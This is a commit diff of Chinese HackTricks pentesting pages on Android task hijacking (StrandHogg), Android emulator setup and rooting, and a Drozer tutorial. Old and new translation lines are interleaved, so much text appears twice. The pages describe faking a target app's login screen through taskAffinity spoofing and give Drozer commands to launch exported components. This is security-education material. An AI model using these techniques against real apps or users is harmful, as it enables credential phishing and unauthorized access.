Android 中,**任务** 本质上是一组用户交互以完成特定工作的活动,组织在 **后栈** 中。这个栈根据活动打开的时间对活动进行排序,最近的活动显示在顶部作为 **前台活动**。在任何时刻,只有这个活动在屏幕上可见,使其成为 **前台任务** 的一部分。
以下是活动转换的简要说明
以下是活动转换的快速概述
* **活动1**开始作为前台中唯一的活动
* 启动**活动2**将**活动1**推送到后退栈,将**活动2**带到前台。
* 启动**活动3**将**活动1**和**活动2**进一步推到堆栈后面,现在**活动3**在前面。
* 关闭**活动3**将**活动2**带回前台展示了Android简化任务导航机制。
* **活动 1** 作为唯一的前台活动开始
* 启动 **活动 2****活动 1** 推入后栈,使 **活动 2** 进入前台。
* 启动 **活动 3****活动 1****活动 2** 进一步推入栈中,**活动 3** 现在在前面。
* 关闭 **活动 3** **活动 2** 重新带回前台,展示了 Android简化任务导航机制。
![https://developer.android.com/images/fundamentals/diagram\_backstack.png](<../../.gitbook/assets/image (698).png>)
## 任务亲和攻击
## 任务亲和攻击
### 任务亲和和启动模式概述
### 任务亲和和启动模式概述
Android应用程序中**任务亲和性**指定活动的首选任务通常与应用程序的包名称对齐。这种设置对于创建用于演示攻击的概念验证PoC应用程序至关重要。
Android 应用程序中,**任务亲和力** 指定活动的首选任务,通常与应用的包名对齐。这个设置在制作用于演示攻击的概念验证 (PoC) 应用时至关重要。
### 启动模式
`launchMode`属性指导任务内活动实例的处理。**singleTask**模式对于此攻击至关重要根据现有活动实例和任务亲和性匹配指导三种情况。攻击的关键在于攻击者的应用程序能够模仿目标应用程序的任务亲和性误导Android系统启动攻击者的应用程序而不是预期的目标应用程序
`launchMode` 属性指导活动实例在任务中的处理。**singleTask** 模式对该攻击至关重要,根据现有活动实例和任务亲和力匹配情况,规定了三种场景。该漏洞依赖于攻击者的应用能够模仿目标应用的任务亲和力,误导 Android 系统启动攻击者的应用而不是预期的目标
### 详细攻击步骤
1. **恶意应用程序安装**:受害者在其设备上安装攻击者的应用程序
2. **初始激活**:受害者首次打开恶意应用程序,为攻击做准备。
3. **目标应用程序启动尝试**:受害者尝试打开目标应用程序
4. **劫持执行**:由于匹配的任务亲和性,恶意应用程序被启动代替目标应用程序
5. **欺骗**:恶意应用程序呈现一个伪造的登录界面,类似于目标应用程序,欺骗用户输入敏感信息。
1. **恶意应用安装**:受害者在其设备上安装攻击者的应用。
2. **初始激活**:受害者首次打开恶意应用,为攻击做准备。
3. **目标应用启动尝试**:受害者尝试打开目标应用。
4. **劫持执行**:由于任务亲和力匹配,恶意应用被启动,取代目标应用
5. **欺骗**:恶意应用展示一个假登录界面,类似于目标应用,欺骗用户输入敏感信息。
要了解此攻击的实际实现请参考GitHub上的Task Hijacking Strandhogg存储库:[Task Hijacking Strandhogg](https://github.com/az0mb13/Task\_Hijacking\_Strandhogg)。
有关此攻击的实际实施,请参考 GitHub 上的任务劫持 Strandhogg 仓库:[Task Hijacking Strandhogg](https://github.com/az0mb13/Task\_Hijacking\_Strandhogg)。
### 预防措施
为防止此类攻击,开发人员可以将`taskAffinity`设置为空字符串,并选择`singleInstance`启动模式,确保其应用程序与其他应用程序隔离。自定义`onBackPressed()`函数提供额外保护,防止任务劫持。
防止此类攻击,开发人员可以将 `taskAffinity` 设置为空字符串,并选择 `singleInstance` 启动模式,确保其应用与其他应用隔离。自定义 `onBackPressed()` 函数提供额外保护,防止任务劫持。
## **参考资料**
## **参考文献**
* [**https://blog.dixitaditya.com/android-task-hijacking/**](https://blog.dixitaditya.com/android-task-hijacking/)
* [**https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html**](https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html)
**Try Hard安全团队**
**Try Hard Security Group**
<figure><img src="../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

128
mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
View file

@ -1,38 +1,39 @@
# AVD - Android虚拟设备
# AVD - Android Virtual Device
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
非常感谢[**@offsecjay**](https://twitter.com/offsecjay)在创建此内容时提供的帮助。
非常感谢 [**@offsecjay**](https://twitter.com/offsecjay) 在创建此内容时的帮助。
## 什么是
Android Studio允许**运行Android的虚拟机您可以用来测试APK文件**。为了使用它们,您将需要:
Android Studio 允许**运行 Android 的虚拟机,以便测试 APK**。为了使用它们,您需要:
* **Android SDK工具** - [在此处下载](https://developer.android.com/studio/releases/sdk-tools)。
* 或者**Android Studio**带有Android SDK工具 - [在此处下载](https://developer.android.com/studio)。
* **Android SDK 工具** - [在这里下载](https://developer.android.com/studio/releases/sdk-tools)。
* 或者 **Android Studio**(带有 Android SDK 工具) - [在这里下载](https://developer.android.com/studio)。
Windows中以我的情况为例**安装Android Studio后**,我将**SDK工具安装在**`C:\Users\<UserName>\AppData\Local\Android\Sdk\tools`
Windows以我的情况为例**安装 Android Studio 后**,我在以下位置找到了 **SDK 工具**`C:\Users\<UserName>\AppData\Local\Android\Sdk\tools`
mac上您可以**下载SDK工具**并将其添加到PATH中运行
mac 上,您可以**下载 SDK 工具**并通过运行将其放入 PATH
```bash
brew tap homebrew/cask
brew install --cask android-sdk
```
或者从**Android Studio GUI**中,如在[https://stackoverflow.com/questions/46402772/failed-to-install-android-sdk-java-lang-noclassdeffounderror-javax-xml-bind-a](https://stackoverflow.com/questions/46402772/failed-to-install-android-sdk-java-lang-noclassdeffounderror-javax-xml-bind-a)中指出的那样,将它们安装在`~/Library/Android/sdk/cmdline-tools/latest/bin/`和`~/Library/Android/sdk/platform-tools/`以及`~/Library/Android/sdk/emulator/`
或者从 **Android Studio GUI** 中,如 [https://stackoverflow.com/questions/46402772/failed-to-install-android-sdk-java-lang-noclassdeffounderror-javax-xml-bind-a](https://stackoverflow.com/questions/46402772/failed-to-install-android-sdk-java-lang-noclassdeffounderror-javax-xml-bind-a) 所示,这将把它们安装在 `~/Library/Android/sdk/cmdline-tools/latest/bin/``~/Library/Android/sdk/platform-tools/` 以及 `~/Library/Android/sdk/emulator/`
对于Java问题:
关于 Java 问题:
```java
export JAVA_HOME=/Applications/Android\ Studio.app/Contents/jbr/Contents/Home
```
@ -40,7 +41,7 @@ export JAVA_HOME=/Applications/Android\ Studio.app/Contents/jbr/Contents/Home
### 准备虚拟机
如果您已安装Android Studio只需打开主项目视图并访问_**工具**_ --> _**AVD 管理器.**_
如果您安装了 Android Studio您可以直接打开主项目视图并访问_**工具**_ --> _**AVD 管理器。**_
<div align="center" data-full-width="false">
@ -52,32 +53,32 @@ export JAVA_HOME=/Applications/Android\ Studio.app/Contents/jbr/Contents/Home
<figure><img src="../../.gitbook/assets/image (1143).png" alt="" width="188"><figcaption></figcaption></figure>
_**选择** 您想要使用的手机_,然后点击 _**下一步.**_
_**选择** 您想要使用的手机_ 并点击 _**下一步。**_
{% hint style="warning" %}
如果您需要安装了Play商店的手机请选择一个带有Play商店图标的手机
如果您需要安装了 Play 商店的手机,请选择带有 Play 商店图标的手机!
<img src="../../.gitbook/assets/image (1144).png" alt="" data-size="original">
{% endhint %}
在当前视图中,您将能够**选择并下载手机将运行的Android映像**
在当前视图中,您将能够 **选择并下载 Android 镜像**,该手机将运行
<figure><img src="../../.gitbook/assets/image (1145).png" alt="" width="375"><figcaption></figcaption></figure>
因此,请选择它,如果尚未下载,请单击名称旁边的 _**下载**_ 符号(**现在等待映像下载完成)**。\
一旦像下载完成,只需选择 **`下一步`** 和 **`完成`**。
所以,选择它,如果没有下载,请点击名称旁边的 _**下载**_ 符号(**现在等待镜像下载完成)。**\
一旦像下载完成,只需选择 **`下一步`** 和 **`完成`**。
虚拟机将被创建。现在**每次访问AVD管理器时它都会出现**
虚拟机将被创建。现在 **每次您访问 AVD 管理器时,它都会存在**
### 运行虚拟机
为了**运行**它,只需按下 _**启动按钮**_
为了 **运行** 它,只需按下 _**启动按钮**_
![](<../../.gitbook/assets/image (518).png>)
## 命令行工具
首先,您需要**决定要使用哪款手机**,为了查看可能的手机列表,请执行:
首先,您需要 **决定要使用哪个手机**,为了查看可能的手机列表,请执行:
```
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat list device
@ -105,12 +106,12 @@ Name: Nexus 10
OEM : Google
[...]
```
一旦您决定要使用的设备名称,您需要**决定要在此设备上运行哪个Android映像。**\
可以使用`sdkmanager`列出所有选项:
一旦你决定了要使用的设备名称,你需要**决定在该设备上运行哪个Android镜像。**\
可以使用`sdkmanager`列出所有选项:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\sdkmanager.bat --list
```
使用以下命令**下载**你想要使用的一个(或全部):
**下载**您想要使用的一个(或全部):
{% code overflow="wrap" %}
```bash
@ -118,7 +119,7 @@ C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\sdkmanager.bat "platform
```
{% endcode %}
下载了想要使用的 Android 镜像,可以使用以下命令**列出所有已下载的 Android 镜像**
一旦您下载了想要使用的 Android 镜像,可以使用以下命令**列出所有已下载的 Android 镜像**
```
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat list target
----------
@ -134,7 +135,7 @@ Type: Platform
API level: 29
Revision: 4
```
在这一刻您已经决定要使用的设备并且已经下载了Android映像因此**您可以使用以下命令创建虚拟机**
此时您已决定要使用的设备,并且已下载了 Android 镜像,因此 **您可以使用以下命令创建虚拟机**
{% code overflow="wrap" %}
```bash
@ -142,8 +143,8 @@ C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat -v create
```
{% endcode %}
上一个命令中我使用设备“_Nexus 5X_”和Android镜像“_system-images;android-28;google\_apis;x86\_64_”创建了一个名为“_AVD9_”的虚拟机。\
现在,您可以使用以下命令**列出您创建的虚拟机**
最后一个命令中**我创建了一个名为** "_AVD9_" 的虚拟机,使用的**设备**是"_Nexus 5X_"**Android镜像**是"_system-images;android-28;google\_apis;x86\_64_"。\
现在你可以使用以下命令**列出你创建的虚拟机**
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat list avd
@ -160,13 +161,13 @@ Error: Google pixel_2 no longer exists as a device
```
### 运行虚拟机
我们已经看到您可以列出已创建的虚拟机,但**您也可以使用以下命令列出它们**
我们已经看到如何列出创建的虚拟机,但**您也可以使用以下命令列出它们**
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -list-avds
AVD9
Pixel_2_API_27
```
您可以简单地使用以下命令**运行创建的任何虚拟机**
您可以简单地**运行任何创建的虚拟机**,使用
{% code overflow="wrap" %}
```bash
@ -175,7 +176,7 @@ C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -avd "AVD9"
```
{% endcode %}
或者使用更高级的选项,可以运行一个虚拟机,如:
或者使用更高级的选项,可以运行一个虚拟机,如:
{% code overflow="wrap" %}
```bash
@ -185,63 +186,64 @@ C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -avd "AVD9" -ht
### 命令行选项
然而,有**许多不同的命令行有用选项**,您可以使用这些选项来启动虚拟机。下面您可以找到一些有趣的选项,但可以[**在这里找到完整列表**](https://developer.android.com/studio/run/emulator-commandline)
然而,有**许多不同的命令行有用选项**可以用来启动虚拟机。下面你可以找到一些有趣的选项,但可以[**在这里找到完整列表**](https://developer.android.com/studio/run/emulator-commandline)
**启动**
* `-snapshot name`启动虚拟机快照
* `-snapshot-list -snapstorage ~/.android/avd/Nexus_5X_API_23.avd/snapshots-test.img`列出所有记录的快照
* `-snapshot name` : 启动虚拟机快照
* `-snapshot-list -snapstorage ~/.android/avd/Nexus_5X_API_23.avd/snapshots-test.img` : 列出所有记录的快照
**网络**
* `-dns-server 192.0.2.0, 192.0.2.255`允许指定逗号分隔的DNS服务器给虚拟机。
* **`-http-proxy 192.168.1.12:8080`**允许指定要使用的HTTP代理非常有用使用Burp捕获流量
* `-port 5556`设置用于控制台和adb的TCP端口号。
* `-ports 5556,5559`设置用于控制台和adb的TCP端口。
* **`-tcpdump /path/dumpfile.cap`**将所有流量捕获到文件中
* `-dns-server 192.0.2.0, 192.0.2.255` : 允许用逗号分隔的DNS服务器指向虚拟机。
* **`-http-proxy 192.168.1.12:8080`** : 允许指示要使用的HTTP代理非常有用以使用Burp捕获流量
* `-port 5556` : 设置用于控制台和adb的TCP端口号。
* `-ports 5556,5559` : 设置用于控制台和adb的TCP端口。
* **`-tcpdump /path/dumpfile.cap`** : 将所有流量捕获到文件中
**系统**
* `-selinux {disabled|permissive}`在Linux操作系统上将安全增强型Linux安全模块设置为禁用或宽松模式。
* `-timezone Europe/Paris`:为虚拟设备设置时区
* `-screen {touch(default)|multi-touch|o-touch}`设置模拟触摸屏模式。
* **`-writable-system`**:使用此选项在仿真会话期间拥有可写系统映像。您还需要运行`adb root; adb remount`。这对于在系统中安装新证书非常有用。
* `-selinux {disabled|permissive}` : 将安全增强Linux安全模块设置为禁用或宽容模式。
* `-timezone Europe/Paris` : 设置虚拟设备的时区
* `-screen {touch(default)|multi-touch|o-touch}` : 设置模拟触摸屏模式。
* **`-writable-system`** : 使用此选项在仿真会话期间拥有可写的系统映像。你还需要运行`adb root; adb remount`。这对于在系统中安装新证书非常有用。
## 对Play商店设备进行Root
## 获取Play Store设备的Root权限
如果您下载了一个带有Play商店的设备您将无法直接获取root权限并且您将收到此错误消息
如果你下载了带有Play Store的设备你将无法直接获取root权限并且会收到此错误消息
```
$ adb root
adbd cannot run as root in production builds
```
使用[rootAVD](https://github.com/newbit1/rootAVD)与[Magisk](https://github.com/topjohnwu/Magisk)我成功对其进行了root操作请参考[**此视频**](https://www.youtube.com/watch?v=Wk0ixxmkzAI) **或** [**这个视频**](https://www.youtube.com/watch?v=qQicUW0svB8))。
使用 [rootAVD](https://github.com/newbit1/rootAVD) 和 [Magisk](https://github.com/topjohnwu/Magisk)我成功地对其进行了root例如可以参考 [**这个视频**](https://www.youtube.com/watch?v=Wk0ixxmkzAI) **或** [**这个视频**](https://www.youtube.com/watch?v=qQicUW0svB8))。
## 安装Burp证书
## 安装 Burp 证书
查看以下页面以了解如何安装自定义CA证书
查看以下页面以了解如何安装自定义 CA 证书:
{% content-ref url="install-burp-certificate.md" %}
[install-burp-certificate.md](install-burp-certificate.md)
{% endcontent-ref %}
## AVD的有用选项
## 优秀的 AVD 选项
### 拍摄快照
您可以**使用GUI**随时拍摄虚拟机的快照:
您可以 **使用 GUI** 随时拍摄虚拟机的快照:
![](<../../.gitbook/assets/image (234).png>)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

158
mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md
View file

@ -1,83 +1,84 @@
# Drozer 教程
# Drozer Tutorial
{% hint style="success" %}
学习和实践 AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<img src="../../../.gitbook/assets/i3.png" alt="" data-size="original">
**漏洞赏金提示****注册** Intigriti这是一家由黑客创建的高级**漏洞赏金平台**!立即加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
**漏洞赏金提示**: **注册** **Intigriti**,一个由黑客为黑客创建的高级 **漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
## 测试的 APK
## 测试的 APK
* [Sieve](https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk)(来自 mrwlabs
* [Sieve](https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk) (来自 mrwlabs)
* [DIVA](https://payatu.com/wp-content/uploads/2016/01/diva-beta.tar.gz)
**本教程的部分内容摘自** [**Drozer 文档 pdf**](https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf)****
**本教程的部分内容摘自** [**Drozer 文档 pdf**](https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf)**.**
## 安装
主机内安装 Drozer 客户端。从 [最新版本发布页面](https://github.com/mwrlabs/drozer/releases) 下载。
您的主机上安装 Drozer Client。可以从 [最新版本](https://github.com/mwrlabs/drozer/releases) 下载。
```bash
pip install drozer-2.4.4-py2-none-any.whl
pip install twisted
pip install service_identity
```
下载并安装 drozer APK 文件从 [最新发布版本](https://github.com/mwrlabs/drozer/releases)。此刻它是 [这个](https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk)。
下载并安装来自[最新版本](https://github.com/mwrlabs/drozer/releases)的drozer APK。目前是[这个](https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk)。
```bash
adb install drozer.apk
```
### 启动服务器
代理正在端口31415上运行我们需要进行[端口转发](https://en.wikipedia.org/wiki/Port\_forwarding)以建立Drozer客户端和代理之间的通信,以下是执行此操作的命令:
Agent 正在 31415 端口上运行,我们需要 [端口转发](https://en.wikipedia.org/wiki/Port\_forwarding) 以建立 Drozer 客户端和 Agent 之间的通信,以下是执行此操作的命令:
```bash
adb forward tcp:31415 tcp:31415
```
最后,**启动**该**应用程序**并按下底部的 "**ON**"
最后,**启动** **应用程序**,并按下底部的 "**开启**"
![](<../../../.gitbook/assets/image (459).png>)
![](<../../../.gitbook/assets/image (459).png>)
然后连接到它:
连接到它:
```bash
drozer console connect
```
## 有趣的命令
## Interesting Commands
| **命令** | **描述** |
| --------------- | ------------------------------------------------------------------------------------------ |
| **Help MODULE** | 显示所选模块的帮助信息 |
| **list** | 显示可以在当前会话中执行的所有 drozer 模块的列表。这会隐藏您没有适当权限运行的模块。 |
| **shell** | 在设备上以代理的上下文启动一个交互式 Linux shell。 |
| **clean** | 删除 Android 设备上 drozer 存储的临时文件。 |
| **load** | 加载包含 drozer 命令并按顺序执行它们的文件。 |
| **module** | 从互联网查找并安装额外的 drozer 模块。 |
| **unset** | 删除 drozer 传递给任何 Linux shell 的命名变量。 |
| **set** | 将一个值存储在一个变量中,该值将作为环境变量传递给 drozer 生成的任何 Linux shell。 |
| **shell** | 在设备上以代理的上下文启动一个交互式 Linux shell。 |
| **run MODULE** | 执行一个 drozer 模块 |
| **exploit** | Drozer 可以创建用于在设备上执行的漏洞利用。`drozer exploit list` |
| **payload** | 漏洞利用需要一个有效载荷。`drozer payload list` |
| **Commands** | **Description** |
| --------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------ |
| **Help MODULE** | 显示所选模块的帮助 |
| **list** | 显示当前会话中可以执行的所有 drozer 模块的列表。这会隐藏您没有适当权限运行的模块。 |
| **shell** | 在设备上启动一个交互式 Linux shell,处于 Agent 的上下文中 |
| **clean** | 删除 drozer 在 Android 设备上存储的临时文件。 |
| **load** | 加载包含 drozer 命令的文件并按顺序执行它们。 |
| **module** | 从互联网查找并安装额外的 drozer 模块。 |
| **unset** | 删除 drozer 传递给其生成的任何 Linux shell 的命名变量。 |
| **set** | 在变量中存储一个值,该值将作为环境变量传递给 drozer 生成的任何 Linux shell。 |
| **shell** | 在设备上启动一个交互式 Linux shell处于 Agent 的上下文中 |
| **run MODULE** | 执行一个 drozer 模块 |
| **exploit** | Drozer 可以创建在设备上执行的漏洞。 `drozer exploit list` |
| **payload** | 漏洞需要一个有效载荷。 `drozer payload list` |
###
### Package
通过包的部分名称过滤查找包的 **名称**
查找 **name** 的包,通过部分名称进行过滤
```bash
dz> run app.package.list -f sieve
com.mwr.example.sieve
```
**软件包的基本信息**
**包的基本信息**:
```bash
dz> run app.package.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
@ -97,11 +98,11 @@ Defines Permissions:
- com.mwr.example.sieve.READ_KEYS
- com.mwr.example.sieve.WRITE_KEYS
```
阅读 **清单**
阅读 **Manifest**:
```bash
run app.package.manifest jakhar.aseem.diva
```
**软件包的攻击面**
**攻击面** of the package:
```bash
dz> run app.package.attacksurface com.mwr.example.sieve
Attack Surface:
@ -111,19 +112,19 @@ Attack Surface:
2 services exported
is debuggable
```
* **Activities**:也许您可以启动一个活动并绕过某种应该阻止您启动它的授权
* **Content providers**:也许您可以访问私人数据或利用某些漏洞SQL注入或路径遍历
* **Services**:
* **is debuggable**: [了解更多](./#is-debuggeable)
* **活动**: 也许你可以启动一个活动并绕过某种授权,这应该阻止你启动它
* **内容提供者**: 也许你可以访问私有数据或利用某些漏洞SQL注入或路径遍历
* **服务**:
* **可调试**: [了解更多](./#is-debuggeable)
### Activities
### 活动
AndroidManifest.xml文件中导出的活动组件的“android:exported”值设置为**“true”**:
导出的活动组件的“android:exported”值在AndroidManifest.xml文件中设置为**“true”**:
```markup
<activity android:name="com.my.app.Initial" android:exported="true">
</activity>
```
**列出导出的活动**
**列出导出活动**:
```bash
dz> run app.activity.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
@ -133,32 +134,36 @@ com.mwr.example.sieve.PWList
```
**启动活动**
也许你可以启动一个活动,并绕过某种应该阻止你启动它的授权。
也许您可以启动一个活动并绕过某种授权,这应该阻止您启动它。
{% code overflow="wrap" %}
```bash
dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
```
{% endcode %}
您还可以通过 **adb** 启动一个导出的活动:
您还可以**adb** 启动导出的活动:
* PackageName 为 com.example.demo
* 导出的 ActivityName 为 com.example.test.MainActivity
* 包名是 com.example.demo
* 导出活动名称是 com.example.test.MainActivity
```bash
adb shell am start -n com.example.demo/com.example.test.MainActivity
```
### 内容提供者
这篇文章内容太多了,**你可以** [**在这里的单独页面中访问它**](exploiting-content-providers.md).
这篇文章太长了,所以 **你可以** [**在这里访问它的独立页面**](exploiting-content-providers.md)。
### 服务
一个导出的服务在 Manifest.xml 中声明:
一个导出的服务在 Manifest.xml 中声明:
{% code overflow="wrap" %}
```markup
<service android:name=".AuthService" android:exported="true" android:process=":remote"/>
```
{% endcode %}
